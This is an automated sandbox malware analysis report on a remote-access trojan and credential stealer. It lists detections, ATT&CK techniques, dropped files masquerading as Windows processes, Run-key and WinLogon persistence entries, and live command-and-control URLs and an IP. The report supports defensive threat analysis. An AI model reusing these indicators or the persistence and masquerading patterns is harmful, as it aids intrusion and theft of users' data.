Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: 00000000.00000002.1299899215.000000001352C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: VIyu4dC9CU.exe PID: 7256, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ctfmon.exe PID: 4828, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ctfmon.exe PID: 7308, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: VIyu4dC9CU.exe, type: SAMPLE
Source: Yara match	File source: 0.0.VIyu4dC9CU.exe.f90000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1241305685.0000000000F92000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\ctfmon.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: VIyu4dC9CU.exe, type: SAMPLE
Source: Yara match	File source: 0.0.VIyu4dC9CU.exe.f90000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\ctfmon.exe, type: DROPPED

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: 00000000.00000002.1299899215.000000001352C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: VIyu4dC9CU.exe PID: 7256, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ctfmon.exe PID: 4828, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ctfmon.exe PID: 7308, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: VIyu4dC9CU.exe, type: SAMPLE
Source: Yara match	File source: 0.0.VIyu4dC9CU.exe.f90000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1241305685.0000000000F92000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\ctfmon.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: VIyu4dC9CU.exe, type: SAMPLE
Source: Yara match	File source: 0.0.VIyu4dC9CU.exe.f90000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\ctfmon.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	141 Windows Management Instrumentation	1 Scripting	11 Process Injection	33 Masquerading	OS Credential Dumping	251 Security Software Discovery	1 Taint Shared Content	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	21 Registry Run Keys / Startup Folder	21 Registry Run Keys / Startup Folder	1 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 DLL Side-Loading	1 DLL Side-Loading	161 Virtualization/Sandbox Evasion	Security Account Manager	161 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	1 Remote System Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Software Packing	Cached Domain Credentials	2 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	34 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 File Deletion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
VIyu4dC9CU.exe	54%	Virustotal		Browse
VIyu4dC9CU.exe	83%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
VIyu4dC9CU.exe	100%	Avira	HEUR/AGEN.1323342
VIyu4dC9CU.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\7z2CYqkT7L.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\Desktop\AOCihfsW.log	100%	Avira	TR/AVI.Agent.updqb
C:\Users\user\Desktop\DhgBcIwD.log	100%	Avira	TR/PSW.Agent.qngqt
C:\Users\user\Desktop\BeMjthTj.log	100%	Avira	TR/AVI.Agent.updqb
C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\AppData\Local\Temp\zsJdcY9yPm.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\AppData\Local\Temp\dxSYZSKoEG.bat	100%	Avira	BAT/Delbat.C
C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	100%	Avira	HEUR/AGEN.1323342
C:\Recovery\ctfmon.exe	100%	Avira	HEUR/AGEN.1323342
C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\AppData\Local\Temp\yFJPVaLwHB.bat	100%	Avira	BAT/Delbat.C
C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\AppData\Local\Temp\CS5lFm0nOf.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\Desktop\DhgBcIwD.log	100%	Joe Sandbox ML
C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	100%	Joe Sandbox ML
C:\Recovery\ctfmon.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\CdEzwRtl.log	100%	Joe Sandbox ML
C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	83%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	83%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Program Files\Google\Chrome\TDdwNhXdQzDImnznNSm.exe	83%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Program Files\Windows Sidebar\Gadgets\TDdwNhXdQzDImnznNSm.exe	83%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Recovery\ctfmon.exe	83%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\AOCihfsW.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\BeMjthTj.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\CdEzwRtl.log	9%	ReversingLabs
C:\Users\user\Desktop\DhgBcIwD.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\DtUIufbH.log	38%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\EfqhSByg.log	38%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\FUcZRGSD.log	25%	ReversingLabs
C:\Users\user\Desktop\HpEyVDEi.log	38%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\IFwiuxEU.log	38%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\IuPYVmtj.log	33%	ReversingLabs	Win32.Ransomware.Bitpy
C:\Users\user\Desktop\MbnYeHgo.log	33%	ReversingLabs	Win32.Ransomware.Bitpy
C:\Users\user\Desktop\MegGnYKL.log	25%	ReversingLabs
C:\Users\user\Desktop\MwnZBuEN.log	33%	ReversingLabs	Win32.Ransomware.Bitpy
C:\Users\user\Desktop\NJzXBuON.log	33%	ReversingLabs	Win32.Ransomware.Bitpy
C:\Users\user\Desktop\OsAnoSoB.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\OvnXGXyF.log	8%	ReversingLabs
C:\Users\user\Desktop\PfChbXEz.log	9%	ReversingLabs
C:\Users\user\Desktop\PtwPpPmY.log	9%	ReversingLabs
C:\Users\user\Desktop\QKWXiCZs.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\RYXOEfJQ.log	9%	ReversingLabs
C:\Users\user\Desktop\UXfGEDIo.log	8%	ReversingLabs
C:\Users\user\Desktop\UpgEQnOA.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\VeGplWJv.log	9%	ReversingLabs
C:\Users\user\Desktop\VponRhip.log	8%	ReversingLabs
C:\Users\user\Desktop\WWWWHnjp.log	8%	ReversingLabs
C:\Users\user\Desktop\XYvNpROm.log	38%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\XwvpSNWN.log	8%	ReversingLabs
C:\Users\user\Desktop\ZQiVzhgV.log	8%	ReversingLabs
C:\Users\user\Desktop\aGreoIOy.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\bbEWzzMV.log	38%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\eIOeVPZc.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\eTxcBbyX.log	38%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\eoPexdBD.log	9%	ReversingLabs
C:\Users\user\Desktop\fdKvAzJi.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\gHPdZtTT.log	33%	ReversingLabs	Win32.Ransomware.Bitpy
C:\Users\user\Desktop\gmTMvKjO.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\jLivJUwn.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\kEMLjtbD.log	33%	ReversingLabs	Win32.Ransomware.Bitpy
C:\Users\user\Desktop\koiTwEAQ.log	25%	ReversingLabs
C:\Users\user\Desktop\kxFTgqTN.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\lHNctDZP.log	25%	ReversingLabs
C:\Users\user\Desktop\mTPcyfdR.log	8%	ReversingLabs
C:\Users\user\Desktop\mwFSlUNE.log	33%	ReversingLabs	Win32.Ransomware.Bitpy
C:\Users\user\Desktop\nRXThXRl.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\njHMYZdD.log	38%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\oHbTlmtF.log	9%	ReversingLabs
C:\Users\user\Desktop\pDLUlABc.log	38%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\pRAsNhes.log	25%	ReversingLabs
C:\Users\user\Desktop\qqitJWYB.log	9%	ReversingLabs
C:\Users\user\Desktop\sNIJIutM.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\swusCNgs.log	25%	ReversingLabs
C:\Users\user\Desktop\tngbTVgk.log	9%	ReversingLabs
C:\Users\user\Desktop\uPLTKmLa.log	8%	ReversingLabs
C:\Users\user\Desktop\vPfJpCEr.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat

Source	Detection	Scanner	Label
http://480344cm.reP	0%	Avira URL Cloud	safe
http://480344cm.renyash.ru/lineSecureUpdateprocessdefaultTestPublicUploadsTemporary.php	100%	Avira URL Cloud	malware
http://480344cm.renyash.ru	100%	Avira URL Cloud	malware
http://480344cm.reny	0%	Avira URL Cloud	safe
http://480344cm.renyash.rupI	0%	Avira URL Cloud	safe
http://480344cm.renyash.ru/	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
480344cm.renyash.ru	172.67.220.198	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://480344cm.renyash.ru/lineSecureUpdateprocessdefaultTestPublicUploadsTemporary.php	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://480344cm.reP	sppsvc.exe, 0000001E.00000002.1501700646.00000000035B8000.00000004.00000800.00020000.00000000.sdmp, sppsvc.exe, 00000038.00000002.1869476937.00000000036A9000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://480344cm.renyash.ru	ctfmon.exe, 00000013.00000002.1434517775.0000000002C18000.00000004.00000800.00020000.00000000.sdmp, ctfmon.exe, 00000013.00000002.1434517775.0000000002DDE000.00000004.00000800.00020000.00000000.sdmp, sppsvc.exe, 0000001E.00000002.1501700646.000000000315D000.00000004.00000800.00020000.00000000.sdmp, sppsvc.exe, 0000001E.00000002.1501700646.00000000035B8000.00000004.00000800.00020000.00000000.sdmp, sppsvc.exe, 0000001E.00000002.1501700646.000000000377E000.00000004.00000800.00020000.00000000.sdmp, VIyu4dC9CU.exe, 0000002F.00000002.1774822275.0000000002EB3000.00000004.00000800.00020000.00000000.sdmp, VIyu4dC9CU.exe, 0000002F.00000002.1774822275.0000000002CED000.00000004.00000800.00020000.00000000.sdmp, sppsvc.exe, 00000038.00000002.1869476937.000000000386E000.00000004.00000800.00020000.00000000.sdmp, sppsvc.exe, 00000038.00000002.1869476937.000000000324F000.00000004.00000800.00020000.00000000.sdmp, sppsvc.exe, 00000038.00000002.1869476937.00000000036A9000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://480344cm.renyash.ru/	sppsvc.exe, 00000038.00000002.1869476937.00000000036A9000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	VIyu4dC9CU.exe, 00000000.00000002.1296943431.000000000370D000.00000004.00000800.00020000.00000000.sdmp, ctfmon.exe, 00000013.00000002.1434517775.0000000002BA7000.00000004.00000800.00020000.00000000.sdmp, ctfmon.exe, 00000013.00000002.1434517775.00000000031C6000.00000004.00000800.00020000.00000000.sdmp, sppsvc.exe, 00000015.00000002.1456851431.000000000343A000.00000004.00000800.00020000.00000000.sdmp, sppsvc.exe, 0000001E.00000002.1501700646.000000000315D000.00000004.00000800.00020000.00000000.sdmp, sppsvc.exe, 0000001E.00000002.1501700646.000000000351B000.00000004.00000800.00020000.00000000.sdmp, TDdwNhXdQzDImnznNSm.exe, 00000023.00000002.1541549373.0000000002C5A000.00000004.00000800.00020000.00000000.sdmp, VIyu4dC9CU.exe, 0000002B.00000002.1721105764.0000000003674000.00000004.00000800.00020000.00000000.sdmp, VIyu4dC9CU.exe, 0000002F.00000002.1774822275.0000000002C4F000.00000004.00000800.00020000.00000000.sdmp, sppsvc.exe, 00000034.00000002.1812150315.000000000394A000.00000004.00000800.00020000.00000000.sdmp, sppsvc.exe, 00000038.00000002.1869476937.000000000324F000.00000004.00000800.00020000.00000000.sdmp, sppsvc.exe, 00000038.00000002.1869476937.000000000360B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://480344cm.renyash.rupI	VIyu4dC9CU.exe, 0000002F.00000002.1774822275.0000000002EB3000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://480344cm.reny	sppsvc.exe, 0000001E.00000002.1501700646.00000000035B8000.00000004.00000800.00020000.00000000.sdmp, sppsvc.exe, 00000038.00000002.1869476937.00000000036A9000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.67.220.198	480344cm.renyash.ru	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1589323
Start date and time:	2025-01-12 01:06:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 24s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	66
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	VIyu4dC9CU.exe renamed because original name is a hash value
Original Sample Name:	54eff01605da5e7cbdb382c98ece2c2a.exe
Detection:	MAL
Classification:	mal100.spre.troj.expl.evad.winEXE@75/109@2/1
EGA Information:	Successful, ratio: 61.5%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, consent.exe, SIHClient.exe, SgrmBroker.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.109.210.53
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target VIyu4dC9CU.exe, PID 3268 because it is empty
Execution Graph export aborted for target VIyu4dC9CU.exe, PID 7256 because it is empty
Execution Graph export aborted for target ctfmon.exe, PID 4828 because it is empty
Execution Graph export aborted for target ctfmon.exe, PID 7308 because it is empty
Execution Graph export aborted for target sppsvc.exe, PID 7872 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
01:07:07	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run sppsvc "C:\Program Files (x86)\reference assemblies\sppsvc.exe"
01:07:15	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run TDdwNhXdQzDImnznNSm "C:\Program Files (x86)\msecache\TDdwNhXdQzDImnznNSm.exe"
02:09:59	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ctfmon "C:\Recovery\ctfmon.exe"
02:10:08	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run VIyu4dC9CU "C:\Users\user\Desktop\VIyu4dC9CU.exe"
02:10:16	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run sppsvc "C:\Program Files (x86)\reference assemblies\sppsvc.exe"
02:10:25	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run TDdwNhXdQzDImnznNSm "C:\Program Files (x86)\msecache\TDdwNhXdQzDImnznNSm.exe"
02:10:33	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ctfmon "C:\Recovery\ctfmon.exe"
02:10:42	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run VIyu4dC9CU "C:\Users\user\Desktop\VIyu4dC9CU.exe"
02:10:51	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run sppsvc "C:\Program Files (x86)\reference assemblies\sppsvc.exe"
02:10:59	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run TDdwNhXdQzDImnznNSm "C:\Program Files (x86)\msecache\TDdwNhXdQzDImnznNSm.exe"
02:11:08	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run ctfmon "C:\Recovery\ctfmon.exe"
02:11:16	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run VIyu4dC9CU "C:\Users\user\Desktop\VIyu4dC9CU.exe"
02:11:32	Autostart	Run: WinLogon Shell "C:\Program Files (x86)\reference assemblies\sppsvc.exe"
02:11:40	Autostart	Run: WinLogon Shell "C:\Program Files\Google\Chrome\TDdwNhXdQzDImnznNSm.exe"
19:07:17	API Interceptor	1x Sleep call for process: ctfmon.exe modified
20:09:59	API Interceptor	2x Sleep call for process: sppsvc.exe modified
20:10:24	API Interceptor	1x Sleep call for process: VIyu4dC9CU.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.67.220.198	544WP3NHaP.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	126987cm.renyash.ru/VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php
	F3ePjP272h.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	328579cm.renyash.ru/VmMulti.php
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, DCRat, LummaC Stealer, PureLog Stealer	Browse	749858cm.renyash.ru/javascriptrequestApiBasePrivate.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://adopt0098.bitbucket.io/	Get hash	malicious	HTMLPhisher	Browse	104.18.10.207
	https://marketing-campaign-solution.vercel.app/	Get hash	malicious	HTMLPhisher	Browse	104.26.0.100
	http://www.telegramrs.com/	Get hash	malicious	Unknown	Browse	104.21.20.160
	https://pub-ce1f93897bdf44e9b1cd99ad0325c570.r2.dev/index.html	Get hash	malicious	HTMLPhisher	Browse	172.67.74.152
	http://www.telegramwg.com/	Get hash	malicious	Unknown	Browse	104.21.20.160
	http://pn7-one-umber.vercel.app/verset.html	Get hash	malicious	HTMLPhisher	Browse	172.67.75.166
	https://wkybcnfuqpgjx.ltd/	Get hash	malicious	Unknown	Browse	172.67.137.41
	http://www.telegram-xp.com/	Get hash	malicious	Unknown	Browse	104.21.20.160
	https://verify-account-checkpoint282.ubpages.com/	Get hash	malicious	Unknown	Browse	104.18.41.137
	http://tall-orchid-wolfsbane.glitch.me/home.html	Get hash	malicious	HTMLPhisher	Browse	162.159.140.237

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	DC86.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	DC86.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse

Created / dropped Files

C:\Program Files (x86)\MSECache\7d63bcb2074184

Download File

Process:	C:\Users\user\Desktop\VIyu4dC9CU.exe
File Type:	ASCII text, with very long lines (977), with no line terminators
Category:	dropped
Size (bytes):	977
Entropy (8bit):	5.899169317408772
Encrypted:	false
SSDEEP:	24:+V2y1sI5E+TIL96ZLmYGFEcxxgQhr81I2SdaaY2zJhiKmFgHj:+V71s0E+T7KYWEcAQ6HaLJ4ZU
MD5:	5603147F283DC9B7B64765AA42819AE3
SHA1:	78145C9F74E50357E05298B0BFA8FB397B6F6F59
SHA-256:	D6346C2AD5E441E096C16FD9922FC2D79167B629712FB02A8D8FB0E02692E9A6
SHA-512:	5C044E57902F9F2C404EA444F95CB03ED4F52C4F6C537A7321AD60486E97C11D75D56F32F552FDEFF3896F4E46E87C269B0BD4071F235BF4D0675CCC42C50C26
Malicious:	false
Preview:	LLQ77iPtW0oiZhEXNWx7iid6Q3VobfZheyBcXtG5t8MByvOo3nx3aiZmsTqEMkR0aGElgm9dP1NjWbHfprvxsgH5YZuDCBsJqVlsrmIRnTniU0QQMKZfzdI39ING25aNJE2A0ZyCidKY3jkiId12mMTMMrtiZBZr2ZYQ7PaxWW6VTtAZip7YEil6vqyJqQnhEcgdKUl3CEfQP73cqT9uDAmTycfQaRGGsZR1NgPODEWADUqxwVcXQ3eEzNpszUcv7Zh0qCPKDvq9omPdvreEztzz4NBA1hYtlkDoxzHuGRTeNfZN7L6H0X6Njr6dAOSgX6XDjlp5kt8hZVmZxyDpkR3NozEG3ou29xHQHWnVgBhGZYyOFgpLLn5FCKZthjB68GilNWRbKrJitxxPA0BX8iqW2BN764y6AlHT0MAtOOBddWWPWKtqin7aZMtMIUeQ3MiIpeYyzRIthM2fp7kwKHYWnr3ocyk3uukRyNk2v41QeO3NTOgLtsFwyMe8ktVBrP9wlkrbWsAPQH1YyqUORZKBoydmsmRCjzjPPGlshFyBszfqUGK3ZGuRE7HxHEsua8qailJrFlrMlITzSwRmcYndFRKS8xlcWDkuJFHs6cyxYiq6nSeUxFSCUNVRa1sRAPzhhjpNpjq9jzEhkOoqSQpRviZ6tzRFthwJsIYEmRpOZSdfIxqMMC8ukhw9Ktd0RkPBD4yc0kDBkb2dF4x6IF3riBjLWY43xz6yCbbN9OVl86JIpT4P5hrLridBVnGcqJOveDancj74uRtm1afCdo8PIvHe8a2VI35ysYom2RxVkxaZz0J4HD8BL8ns56pCrlv1W43dv3JM1npUVrpHQ7NE43ntv6q6lun8BjD47qJO3vKhTSXOQhwuXr6cQJrzMNkG9qTvouKjy8KJtGadjcpD83kTmkox9TCqKDim9ljgXM5ZgxtKtOQuigIFF9IDFWke6e8qixe72Jqv7

C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe

Download File

Process:	C:\Users\user\Desktop\VIyu4dC9CU.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	2023936
Entropy (8bit):	7.569672649447316
Encrypted:	false
SSDEEP:	49152:gWLMtwyMxRizAwgueOJNN3lRHiKLWDWU:gLwyMb9ue0NTH2P
MD5:	54EFF01605DA5E7CBDB382C98ECE2C2A
SHA1:	BE2ECFC24603A5E282BDFBB7780A03C1410879B8
SHA-256:	26BDA6E083DB3A3C3CCAF29434850D91BBB9E10C48886A6F6A06BBF6C183448D
SHA-512:	DD00705FB9741C6400145E2433AF42605264A95E4C1FE44EE1579AC464463F9B493D8BDEF98AF4A5B03D717CD79357674CC09E5B8780C4FFE31A9704B08C89D0
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 83%
